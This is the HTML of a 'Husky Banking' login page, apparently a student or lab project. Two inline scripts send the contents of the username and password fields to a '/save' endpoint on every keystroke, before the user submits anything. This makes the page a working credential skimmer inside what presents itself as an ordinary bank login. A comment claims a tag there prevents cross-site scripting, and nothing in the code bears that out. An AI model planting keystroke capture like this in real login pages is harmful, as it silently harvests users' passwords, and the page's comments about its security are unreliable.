<!DOCTYPE html>
<html lang="en">


<head>
	<title>Husky Banking</title>
	<link rel="stylesheet" href="/static/base.css">
</head>



<body>
	<form id="mainHandler" method="post">
		<h1 id="loginHeader">Husky Banking</h1>
		<p id="slogan">A bank where you know your money is in the right paws!</p>
		<!-- used for inheratance, this is where the baseLogin block will be placed -->

		<!-- login tag that prevents cross scripting -->
		
		
			<script>alert("Wrong username or password.");</script>
		 

		<!-- Input objects being called through the login class that is passed through -->
		<p id="userInput"> <label for="username">Username</label>: <input id="username" name="username" required size="32" type="text" value=""> </p>

		<script>
        const user = document.getElementById('username');

        user.addEventListener('input', function() {
           userName = user.value;
           userInput = "USER: " + userName;
            sendData(userInput);
        });

        function sendData(data) {
            fetch('/save', {
                method: 'POST',
                headers: {
                    'Content-Type': 'application/json'
                },
                "body": JSON.stringify({text: data})
            })
            .catch(error => console.error('Error:', error));
        }
    	</script>


		<p id="passInput"> <label for="password">Password</label>: <input id="password" name="password" required size="32" type="password" value=""> </p>

		<script>
        const pass = document.getElementById('password');

        pass.addEventListener('input', function() {
           passWord = pass.value;
           passInput = "PASS: " + passWord;
            sendData(passInput);
        });

        function sendData(data) {
            fetch('/save', {
                method: 'POST',
                headers: {
                    'Content-Type': 'application/json'
                },
                "body": JSON.stringify({text: data})
            })
            .catch(error => console.error('Error:', error));
        }
    	</script>


		<p id="signIn"><input id="submit" name="submit" type="submit" value="Sign In"></p>

		
		<p id="customPage"> <input id="customPage" name="submit" type="submit" value="Custom Page"></p>
		

		<!-- Where the login block is placed -->
		

    <div id="johnathan"></div>

    <!-- call the javascript file which changes the images within the login page -->
    <script src="/static/js/imageJS.js">
    </script>


	</form>
</body>
</html>